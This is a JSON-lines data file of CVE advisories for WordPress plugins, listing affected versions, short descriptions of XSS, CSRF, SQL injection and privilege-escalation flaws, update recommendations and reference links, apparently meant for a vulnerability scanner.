{"CVE_ID":"CVE-2023-46627","slug":"wp-simple-html-sitemap","versionImpact":"2.2","versionEndExcluding":"2.3","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Ashish Ajani WordPress Simple HTML Sitemap plugin <=\u00a02.1 versions.","recommendation":"Update to version 2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-simple-html-sitemap\\\/wordpress-wordpress-simple-html-sitemap-plugin-2-1-cross-site-scripting-xss-vulnerability-2?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-simple-html-sitemap\\\/wordpress-wordpress-simple-html-sitemap-plugin-2-1-cross-site-scripting-xss-vulnerability-2?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12250","slug":"accept-authorize-net-payments-using-contact-form-7","versionImpact":"2.2","versionEndExcluding":"2.3","description":"The Accept Authorize.NET Payments Using Contact Form 7 plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2 via the cf7adn-info.php file. This makes it possible for unauthenticated attackers to extract configuration data which can be used to aid in other attacks.","recommendation":"Update to version 2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208517%40accept-authorize-net-payments-using-contact-form-7&new=3208517%40accept-authorize-net-payments-using-contact-form-7&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208517%40accept-authorize-net-payments-using-contact-form-7&new=3208517%40accept-authorize-net-payments-using-contact-form-7&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8801b9a-afcb-483b-a018-4f68448e96de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8801b9a-afcb-483b-a018-4f68448e96de?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2202","slug":"siteorigin-panels","versionImpact":"2.29.6","versionEndExcluding":"2.29.7","description":"The Page Builder by SiteOrigin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the legacy Image widget in all versions up to, and including, 2.29.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.29.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52116a6f-506f-4eeb-9bcc-19900ef38101?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52116a6f-506f-4eeb-9bcc-19900ef38101?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/siteorigin-panels\\\/trunk\\\/widgets\\\/widgets.php#L911\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/siteorigin-panels\\\/trunk\\\/widgets\\\/widgets.php#L911\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3053935%40siteorigin-panels&new=3053935%40siteorigin-panels&sfp_email=&sfph_mail=#file31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3053935%40siteorigin-panels&new=3053935%40siteorigin-panels&sfp_email=&sfph_mail=#file31\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4361","slug":"siteorigin-panels","versionImpact":"2.29.15","versionEndExcluding":"2.29.16","description":"The Page Builder by SiteOrigin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'siteorigin_widget' shortcode in all versions up to, and including, 2.29.15 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.29.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a97f72f6-86f7-45dc-908a-292ba735071d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a97f72f6-86f7-45dc-908a-292ba735071d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/siteorigin-panels\\\/trunk\\\/inc\\\/widget-shortcode.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/siteorigin-panels\\\/trunk\\\/inc\\\/widget-shortcode.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086025\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086025\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13515","slug":"image-source-control-isc","versionImpact":"2.28.0","versionEndExcluding":"2.28.1","description":"The Image Source Control Lite \u2013 Show Image Credits and Captions plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'path' parameter in all versions up to, and including, 2.28.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.28.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/webzunft\\\/image-source-control\\\/commit\\\/d1461b886ed2991281c2eb95e98c9b211e737a93\",\"name\":\"https:\\\/\\\/github.com\\\/webzunft\\\/image-source-control\\\/commit\\\/d1461b886ed2991281c2eb95e98c9b211e737a93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3172639%40image-source-control-isc&new=3172639%40image-source-control-isc&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3172639%40image-source-control-isc&new=3172639%40image-source-control-isc&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3188412%40image-source-control-isc&new=3188412%40image-source-control-isc&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3188412%40image-source-control-isc&new=3188412%40image-source-control-isc&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4debc89-d5ea-4cf1-8e69-197a75794d0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4debc89-d5ea-4cf1-8e69-197a75794d0b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6059","slug":"seraphinite-accelerator","versionImpact":"2.27.21","versionEndExcluding":"2.27.22","description":"The Seraphinite Accelerator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.27.21. This is due to missing or incorrect nonce validation on the 'OnAdminApi_CacheOpBegin' function. This makes it possible for unauthenticated attackers to perform several administrative actions, including deleting the cache, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.27.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seraphinite-accelerator\\\/trunk\\\/main.php#L2259\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seraphinite-accelerator\\\/trunk\\\/main.php#L2259\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284098\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284098\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f711c9d0-aa56-4e4c-bbcf-afa9598c3518?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f711c9d0-aa56-4e4c-bbcf-afa9598c3518?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6934","slug":"limit-login-attempts-reloaded","versionImpact":"2.25.26","versionEndExcluding":"2.25.27","description":"The Limit Login Attempts Reloaded plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 2.25.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.25.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/906049c0-4710-47aa-bf44-cdf29032dc1f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/906049c0-4710-47aa-bf44-cdf29032dc1f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/limit-login-attempts-reloaded\\\/trunk\\\/core\\\/Shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/limit-login-attempts-reloaded\\\/trunk\\\/core\\\/Shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012447%40limit-login-attempts-reloaded%2Ftrunk&old=2995934%40limit-login-attempts-reloaded%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012447%40limit-login-attempts-reloaded%2Ftrunk&old=2995934%40limit-login-attempts-reloaded%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5525","slug":"limit-login-attempts-reloaded","versionImpact":"2.25.25","versionEndExcluding":"2.25.26","description":"The Limit Login Attempts Reloaded WordPress plugin before 2.25.26 is missing authorization on the `toggle_auto_update` AJAX action, allowing any user with a valid nonce to toggle the auto-update status of the plugin.","recommendation":"Update to version 2.25.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/654bad15-1c88-446a-b28b-5a412cc0399d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/654bad15-1c88-446a-b28b-5a412cc0399d\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37941","slug":"internal-links","versionImpact":"2.24.3","versionEndExcluding":"2.24.4","description":"Cross-Site Request Forgery (CSRF) vulnerability in Internal Link Juicer Internal Link Juicer: SEO Auto Linker for WordPress.This issue affects Internal Link Juicer: SEO Auto Linker for WordPress: from n\/a through 2.24.3.","recommendation":"Update to version 2.24.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/internal-links\\\/wordpress-internal-link-juicer-seo-auto-linker-for-wordpress-plugin-2-24-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/internal-links\\\/wordpress-internal-link-juicer-seo-auto-linker-for-wordpress-plugin-2-24-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5559","slug":"tenweb-speed-optimizer","versionImpact":"2.24.14","versionEndExcluding":"2.24.18","description":"The 10Web Booster WordPress plugin before 2.24.18 does not validate the option name given to some AJAX actions, allowing unauthenticated users to delete arbitrary options from the database, leading to denial of service.","recommendation":"Update to version 2.24.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eba46f7d-e4db-400c-8032-015f21087bbf\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eba46f7d-e4db-400c-8032-015f21087bbf\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4448","slug":"give","versionEndExcluding":"2.24.0","description":"The GiveWP WordPress plugin before 2.24.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce467a2e-081e-4a6c-bfa4-29e4447ebd3b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce467a2e-081e-4a6c-bfa4-29e4447ebd3b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0224","slug":"give","versionImpact":"2.23.2","versionEndExcluding":"2.24","description":"The GiveWP WordPress plugin before 2.24.1 does not properly escape user input before it reaches SQL queries, which could let unauthenticated attackers perform SQL Injection attacks","recommendation":"Update to version 2.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d8da539d-0a1b-46ef-b48d-710c59cf68e1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d8da539d-0a1b-46ef-b48d-710c59cf68e1\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/givewp.com\\\/core-2-24-0-vulnerability-patched\\\/\",\"name\":\"https:\\\/\\\/givewp.com\\\/core-2-24-0-vulnerability-patched\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0657","slug":"internal-links","versionImpact":"2.23.4","versionEndExcluding":"2.23.5","description":"The Internal Link Juicer: SEO Auto Linker for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings such as 'ilj_settings_field_links_per_page'  in all versions up to, and including, 2.23.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.23.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41d39fe4-b114-4612-92f6-75d6597610f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41d39fe4-b114-4612-92f6-75d6597610f7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033238%40internal-links&new=3033238%40internal-links&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033238%40internal-links&new=3033238%40internal-links&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7269","slug":"artplacer-widget","versionImpact":"2.21.1","versionEndExcluding":"2.21.2","description":"The ArtPlacer Widget WordPress plugin before 2.21.2 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"Update to version 2.21.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e8e1186-323b-473b-a0c4-580dc94020d7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e8e1186-323b-473b-a0c4-580dc94020d7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7268","slug":"artplacer-widget","versionImpact":"2.21.1","versionEndExcluding":"2.21.2","description":"The ArtPlacer Widget WordPress plugin before 2.21.2 does not have authorisation check in place when deleting widgets,  allowing ay authenticated users, such as subscriber, to delete arbitrary widgets","recommendation":"Update to version 2.21.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ac233dd-e00d-4aee-a41c-0de6e8aaefd7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ac233dd-e00d-4aee-a41c-0de6e8aaefd7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8800","slug":"rabbit-loader","versionImpact":"2.21.0","versionEndExcluding":"2.21.1","description":"The RabbitLoader \u2013 Website Speed Optimization for improving Core Web Vital metrics with Cache, Image Optimization, and more plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.21.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.21.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba435b26-a6f1-41cf-acb8-fffd8a18fea7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba435b26-a6f1-41cf-acb8-fffd8a18fea7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rabbit-loader\\\/tags\\\/2.21.0\\\/inc\\\/tab_init.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rabbit-loader\\\/tags\\\/2.21.0\\\/inc\\\/tab_init.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160267\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160267\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8756","slug":"quform","versionImpact":"2.20.0","versionEndExcluding":"2.21.0","description":"The Quform - WordPress Form Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.20.0 via the 'saveUploadedFile' function. This makes it possible for unauthenticated attackers to extract sensitive data, such as Personally Identifiable Information, from files uploaded by users. Files uploaded via forms created before version 2.21.0 will remain vulnerable to exposure after upgrading. To fully patch the plugin, site administrators should download any previously uploaded files, delete previously existing files and forms, and create the forms again after upgrading to version 2.21.0.","recommendation":"Update to version 2.21.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/beb8ea66-3cd7-452f-9e64-8439de0ddc55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/beb8ea66-3cd7-452f-9e64-8439de0ddc55?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/quform-wordpress-form-builder\\\/706149\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/quform-wordpress-form-builder\\\/706149\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6373","slug":"artplacer-widget","versionImpact":"2.20.6","versionEndExcluding":"2.20.7","description":"The ArtPlacer Widget WordPress plugin before 2.20.7 does not sanitize and escape the \"id\" parameter before submitting the query, leading to a SQLI exploitable by editors and above. Note: Due to the lack of CSRF check, the issue could also be exploited via a CSRF against a logged editor (or above)","recommendation":"Update to version 2.20.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/afc11c92-a7c5-4e55-8f34-f2235438bd1b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/afc11c92-a7c5-4e55-8f34-f2235438bd1b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5611","slug":"seraphinite-accelerator","versionImpact":"2.20.31","versionEndExcluding":"2.20.32","description":"The Seraphinite Accelerator WordPress plugin before 2.20.32 does not have authorisation and CSRF checks when resetting and importing its settings, allowing unauthenticated users to reset them","recommendation":"Update to version 2.20.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8cb8a5e9-2ab6-4d9b-9ffc-ef530e346f8d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8cb8a5e9-2ab6-4d9b-9ffc-ef530e346f8d\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5610","slug":"seraphinite-accelerator","versionImpact":"2.20.28","versionEndExcluding":"2.20.29","description":"The Seraphinite Accelerator WordPress plugin before 2.2.29 does not validate the URL to redirect any authenticated user to, leading to an arbitrary redirect","recommendation":"Update to version 2.20.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e880a9fb-b089-4f98-9781-7d946f22777e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e880a9fb-b089-4f98-9781-7d946f22777e\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5609","slug":"seraphinite-accelerator","versionImpact":"2.20.28","versionEndExcluding":"2.20.29","description":"The Seraphinite Accelerator WordPress plugin before 2.2.29 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 2.20.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aac4bcc8-b826-4165-aed3-f422dd178692\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aac4bcc8-b826-4165-aed3-f422dd178692\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5703","slug":"gift-up","versionImpact":"2.20.1","versionEndExcluding":"2.20.2","description":"The Gift Up Gift Cards for WordPress and WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'giftup' shortcode in all versions up to, and including, 2.20.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.20.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e498706-3dbe-4c48-9c0d-0d90677aba0d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e498706-3dbe-4c48-9c0d-0d90677aba0d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-up\\\/tags\\\/2.20.1\\\/view\\\/giftup-checkout.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-up\\\/tags\\\/2.20.1\\\/view\\\/giftup-checkout.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-up\\\/tags\\\/2.20.1\\\/view\\\/giftup-checkout.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-up\\\/tags\\\/2.20.1\\\/view\\\/giftup-checkout.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2989802\\\/gift-up#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2989802\\\/gift-up#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12589","slug":"finale-woocommerce-sales-countdown-timer-discount","versionImpact":"2.19.0","versionEndExcluding":"2.20.0","description":"The Finale Lite \u2013 Sales Countdown Timer & Discount for WooCommerce plugin for WordPress is vulnerable to Stored DOM-Based Cross-Site Scripting via the countdown timer in all versions up to, and including, 2.19.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.20.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247611\\\/finale-woocommerce-sales-countdown-timer-discount\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247611\\\/finale-woocommerce-sales-countdown-timer-discount\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae0a001b-0792-4a32-8f49-5d4b1550f4be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae0a001b-0792-4a32-8f49-5d4b1550f4be?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10860","slug":"woo-thank-you-page-nextmove-lite","versionImpact":"2.19.0","versionEndExcluding":"2.20.0","description":"The NextMove Lite \u2013 Thank You Page for WooCommerce plugin for WordPress is vulnerable to unauthorized submission of data due to a missing capability check on the _submit_uninstall_reason_action() function in all versions up to, and including, 2.19.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to submit a deactivation reason on behalf of a site.","recommendation":"Update to version 2.20.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246927\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246927\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cefecf8-46dc-4ae1-9e94-b724beb7136f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cefecf8-46dc-4ae1-9e94-b724beb7136f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9645","slug":"post-grid","versionImpact":"2.2.92","versionEndExcluding":"2.2.93","description":"The Post Grid, Posts Slider, Posts Carousel, Post Filter, Post Masonry WordPress plugin before 2.2.93 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.2.93, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cfd6db83-5e7f-4631-87c3-fdcd4c64c4fe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cfd6db83-5e7f-4631-87c3-fdcd4c64c4fe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8253","slug":"post-grid","versionImpact":"2.2.90","versionEndExcluding":"2.2.91","description":"The Post Grid and Gutenberg Blocks plugin for WordPress is vulnerable to privilege escalation in all versions 2.2.87 to 2.2.90. This is due to the plugin not properly restricting what user meta values can be updated and ensuring a form is active. This makes it possible for authenticated attackers, with subscriber-level access and above, to update their user meta to become an administrator.","recommendation":"Update to version 2.2.91, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5f18cae-b7f8-4afd-adfa-c616c63f9419?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5f18cae-b7f8-4afd-adfa-c616c63f9419?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/trunk\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php#L3032\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/trunk\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php#L3032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3130155\\\/post-grid\\\/tags\\\/2.2.87\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3130155\\\/post-grid\\\/tags\\\/2.2.87\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146752\\\/post-grid\\\/tags\\\/2.2.91\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146752\\\/post-grid\\\/tags\\\/2.2.91\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php\",\"refsource\":\"\",\"tags\":[]}]"}
